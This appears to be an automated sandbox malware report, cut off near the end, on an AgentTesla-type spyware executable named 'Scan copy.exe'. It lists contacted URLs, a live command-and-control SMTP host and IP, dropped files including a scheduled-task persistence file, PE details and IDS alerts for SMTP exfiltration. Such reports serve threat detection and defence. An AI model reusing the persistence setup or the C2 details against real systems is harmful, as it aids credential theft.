                                        http://www.sakkal.comScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmp, Scan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zipScan copy.exe, 00000000.00000002.228452111.0000000003BD9000.00000004.00000001.sdmp, Scan copy.exe, 00000007.00000000.224405291.0000000000402000.00000040.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://uZoqoU.comScan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.fontbureau.comalsdScan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.apache.org/licenses/LICENSE-2.0Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                          		high
                                          http://www.fontbureau.comScan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpfalse
                                            		high
                                            http://www.galapagosdesign.com/Scan copy.exe, 00000000.00000003.212350163.0000000005C83000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.sakkal.com(.Scan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            http://DynDns.comDynDNSScan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comFScan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.agfamonotype.Scan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comascCScan copy.exe, 00000000.00000002.235863544.0000000005C70000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%haScan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/jp/nScan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/JScan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://aJWYmLGLhn6n2.orgScan copy.exe, 00000007.00000002.472756122.0000000003081000.00000004.00000001.sdmp, Scan copy.exe, 00000007.00000002.475024688.0000000003331000.00000004.00000001.sdmp, Scan copy.exe, 00000007.00000002.474880893.00000000032F9000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/jp/Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comdScan copy.exe, 00000000.00000003.211341218.0000000005C75000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/uea$Scan copy.exe, 00000000.00000003.207626091.0000000005C75000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.carterandcone.comlScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn/Scan copy.exe, 00000000.00000003.204992463.0000000005C78000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/yScan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.com/designers/cabarga.htmlNScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                              		high
                                              http://www.jiyu-kobo.co.jp/hetJScan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.founder.com.cn/cnScan copy.exe, 00000000.00000003.205522633.0000000005C76000.00000004.00000001.sdmp, Scan copy.exe, 00000000.00000003.204749021.0000000005C77000.00000004.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.fontbureau.com/designers/frere-jones.htmlScan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                                		high
                                                http://www.jiyu-kobo.co.jp/hetScan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.commScan copy.exe, 00000000.00000002.235863544.0000000005C70000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/Scan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/nScan copy.exe, 00000000.00000003.207626091.0000000005C75000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.fontbureau.comoScan copy.exe, 00000000.00000002.235863544.0000000005C70000.00000004.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.jiyu-kobo.co.jp/vaoCScan copy.exe, 00000000.00000003.207848001.0000000005C75000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers8Scan copy.exe, 00000000.00000002.235904251.0000000005D60000.00000002.00000001.sdmpfalse
                                                  		high
                                                  http://www.ascendercorp.com/typedesigners.htmllScan copy.exe, 00000000.00000003.208029276.0000000005C75000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designers/Scan copy.exe, 00000000.00000003.208701839.0000000005CAE000.00000004.00000001.sdmpfalse
                                                    		high

                                                    Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    93.89.24.35
                                                    		smtp.atlmexco.comTurkey
                                                    		29141BKVG-ASDEtrue

                                                    General Information

                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                    Analysis ID:433218
                                                    Start date:11.06.2021
                                                    Start time:13:20:24
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 9m 19s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:light
                                                    Sample file name:Scan copy.exe
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:30
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@6/5@1/1
                                                    EGA Information:Failed
                                                    HDC Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 97%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Found application associated with file extension: .exe
                                                    Warnings:
                                                    Show All
                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded IPs from analysis (whitelisted): 13.64.90.137, 92.122.145.220, 184.30.20.56, 20.50.102.62, 93.184.221.240, 20.54.7.98, 20.54.104.15, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.209.183
                                                    • Excluded domains from analysis (whitelisted): store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    13:21:19API Interceptor765x Sleep call for process: Scan copy.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    93.89.24.35Scan copy.exeGet hashmaliciousBrowse
                                                      Scan copy.exeGet hashmaliciousBrowse

                                                        Domains

                                                        No context

                                                        ASN

                                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                        BKVG-ASDEScan copy.exeGet hashmaliciousBrowse
                                                        • 93.89.24.35
                                                        Scan copy.exeGet hashmaliciousBrowse
                                                        • 93.89.24.35
                                                        https://ntmp-log.wowdigitech.com/ga/click/2-39854561-1849-12357-24298-27003-dbf48d5c17-74d2ecc202Get hashmaliciousBrowse
                                                        • 80.83.124.119
                                                        https://win-tk.windows7indir.com/ga/click/2-39877771-1850-12356-24297-26999-89eb543f2e-072690a48cGet hashmaliciousBrowse
                                                        • 80.83.124.119
                                                        Form.docGet hashmaliciousBrowse
                                                        • 80.83.126.232
                                                        https://fiera-deutzfahr.com/wp-admin/Overview/6555921/6uw9g10b-0079388/Get hashmaliciousBrowse
                                                        • 130.255.76.204
                                                        FEk69sVIyf.exeGet hashmaliciousBrowse
                                                        • 5.45.186.113
                                                        well.exeGet hashmaliciousBrowse
                                                        • 31.170.107.186
                                                        hvavwcah.exeGet hashmaliciousBrowse
                                                        • 130.255.73.90
                                                        326004368fa6e481cc228b4167a83e89e53ac232f4e4d14dbefb386614291722.exeGet hashmaliciousBrowse
                                                        • 130.255.73.90
                                                        Font_update.exeGet hashmaliciousBrowse
                                                        • 130.255.78.223
                                                        xasxas.exeGet hashmaliciousBrowse
                                                        • 130.255.73.90
                                                        Emotet.docGet hashmaliciousBrowse
                                                        • 80.83.113.182
                                                        710288-30017168893.jsGet hashmaliciousBrowse
                                                        • 5.45.186.113

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Scan copy.exe.log
                                                        Process:C:\Users\user\Desktop\Scan copy.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:modified
                                                        Size (bytes):1314
                                                        Entropy (8bit):5.350128552078965
                                                        Encrypted:false
                                                        SSDEEP:24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmEw:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHR
                                                        MD5:1DC1A2DCC9EFAA84EABF4F6D6066565B
                                                        SHA1:B7FCF805B6DD8DE815EA9BC089BD99F1E617F4E9
                                                        SHA-256:28D63442C17BF19558655C88A635CB3C3FF1BAD1CCD9784090B9749A7E71FCEF
                                                        SHA-512:95DD7E2AB0884A3EFD9E26033B337D1F97DDF9A8E9E9C4C32187DCD40622D8B1AC8CCDBA12A70A6B9075DF5E7F68DF2F8FBA4AB33DB4576BE9806B8E191802B7
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                        C:\Users\user\AppData\Local\Temp\tmp3F10.tmp
                                                        Process:C:\Users\user\Desktop\Scan copy.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1640
                                                        Entropy (8bit):5.183557342788241
                                                        Encrypted:false
                                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBVtn:cbh47TlNQ//rydbz9I3YODOLNdq3x
                                                        MD5:628D95CBD21900923D18951C3B798AFC
                                                        SHA1:91B96CBB27F36D61599F6C591A1C118893D638E8
                                                        SHA-256:EB8DD379D400083487B1E60229A102B6DC53D56F26C1DBE8C2FF1174D0C97414
                                                        SHA-512:8FB4AB693C3FB2EF59C042FE54E38358B8D0ABF973A2C0AE9D31256F590344CEB5E93F431C0B805E8CE7B3531E260AA104EAB79B92E811C272BF8783F9EBE0A6
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true
                                                        C:\Users\user\AppData\Roaming\emmrGOU.exe
                                                        Process:C:\Users\user\Desktop\Scan copy.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):981504
                                                        Entropy (8bit):7.8570248754229
                                                        Encrypted:false
                                                        SSDEEP:24576:aNUWE+vLs3S9FM1o9//fK37535oI9YLNeBUdt:aUWPLUSzM1ohXcB5oskwBU
                                                        MD5:502390A59AAD886FA91210A1B89C89B5
                                                        SHA1:B5CCFD3C93F4625BB46DDFB6BD314C7533653368
                                                        SHA-256:661BB6D9FD6302E1C06C8D3D6182720259DF9CE73B5251127C21EB4883EBCF7F
                                                        SHA-512:35F616C75B7409E1CC3869CAC75B5FB2D2AFC8FFA676306F163913B3696709D2EE2973A30AD0E033FB8229BA0BAA2E223A4DDA211149FC5D43512649F29AD046
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Reputation:low
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.............b.... ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text...h.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................D.......H........T..4............Y..............................................0............(!...(".........(.....o#....*.....................($......(%......(&......('......((....*N..(....o....()....*&..(*....*.s+........s,........s-........s.........s/........*....0...........~....o0....+..*.0...........~....o1....+..*.0...........~....o2....+..*.0...........~....o3....+..*.0...........~....o4....+..*&..(5....*...0..<........~.....(6.....,!r...p.....(7...o8...s9............~.....
                                                        C:\Users\user\AppData\Roaming\emmrGOU.exe:Zone.Identifier
                                                        Process:C:\Users\user\Desktop\Scan copy.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):26
                                                        Entropy (8bit):3.95006375643621
                                                        Encrypted:false
                                                        SSDEEP:3:ggPYV:rPYV
                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                        Malicious:true
                                                        Reputation:high, very likely benign file
                                                        Preview: [ZoneTransfer]....ZoneId=0
                                                        C:\Users\user\AppData\Roaming\no3dcizx.kcl\Chrome\Default\Cookies
                                                        Process:C:\Users\user\Desktop\Scan copy.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.6970840431455908
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                        Malicious:false
                                                        Reputation:high, very likely benign file
                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Entropy (8bit):7.8570248754229
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                        • Windows Screen Saver (13104/52) 0.07%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        File name:Scan copy.exe
                                                        File size:981504
                                                        MD5:502390a59aad886fa91210a1b89c89b5
                                                        SHA1:b5ccfd3c93f4625bb46ddfb6bd314c7533653368
                                                        SHA256:661bb6d9fd6302e1c06c8d3d6182720259df9ce73b5251127c21eb4883ebcf7f
                                                        SHA512:35f616c75b7409e1cc3869cac75b5fb2d2afc8ffa676306f163913b3696709d2ee2973a30ad0e033fb8229ba0baa2e223a4dda211149fc5d43512649f29ad046
                                                        SSDEEP:24576:aNUWE+vLs3S9FM1o9//fK37535oI9YLNeBUdt:aUWPLUSzM1ohXcB5oskwBU
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.............b.... ... ....@.. .......................`............@................................

                                                        File Icon

                                                        Icon Hash:00828e8e8686b000

                                                        Static PE Info

                                                        General

                                                        Entrypoint:0x4f0c62
                                                        Entrypoint Section:.text
                                                        Digitally signed:false
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                        Time Stamp:0x60C1D106 [Thu Jun 10 08:44:54 2021 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:v4.0.30319
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                        Entrypoint Preview

                                                        Instruction
                                                        jmp dword ptr [00402000h]
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al
                                                        add byte ptr [eax], al

                                                        Data Directories

                                                        NameVirtual AddressVirtual Size Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xf0c100x4f.text
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf20000x690.rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0xf0ad80x1c.text
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                        Sections

                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                        .text0x20000xeec680xeee00False0.881620797357data7.86391692068IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                        .rsrc0xf20000x6900x800False0.34619140625data3.59855610159IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .reloc0xf40000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                        Resources

                                                        NameRVASizeTypeLanguageCountry
                                                        RT_VERSION0xf20900x400data
                                                        RT_MANIFEST0xf24a00x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                        Imports

                                                        DLLImport
                                                        mscoree.dll_CorExeMain

                                                        Version Infos

                                                        DescriptionData
                                                        Translation0x0000 0x04b0
                                                        LegalCopyrightCopyright Sutton Grammar School 2015
                                                        Assembly Version1.0.0.0
                                                        InternalNamePermissionSetEntryFieldId.exe
                                                        FileVersion1.0.0.0
                                                        CompanyNameSutton Grammar School
                                                        LegalTrademarks
                                                        Comments
                                                        ProductNameAspiring Rookie - Basketball
                                                        ProductVersion1.0.0.0
                                                        FileDescriptionAspiring Rookie - Basketball
                                                        OriginalFilenamePermissionSetEntryFieldId.exe

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        06/11/21-13:23:03.338583TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49744587192.168.2.393.89.24.35
                                                        06/11/21-13:23:05.115833TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49745587192.168.2.393.89.24.35

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
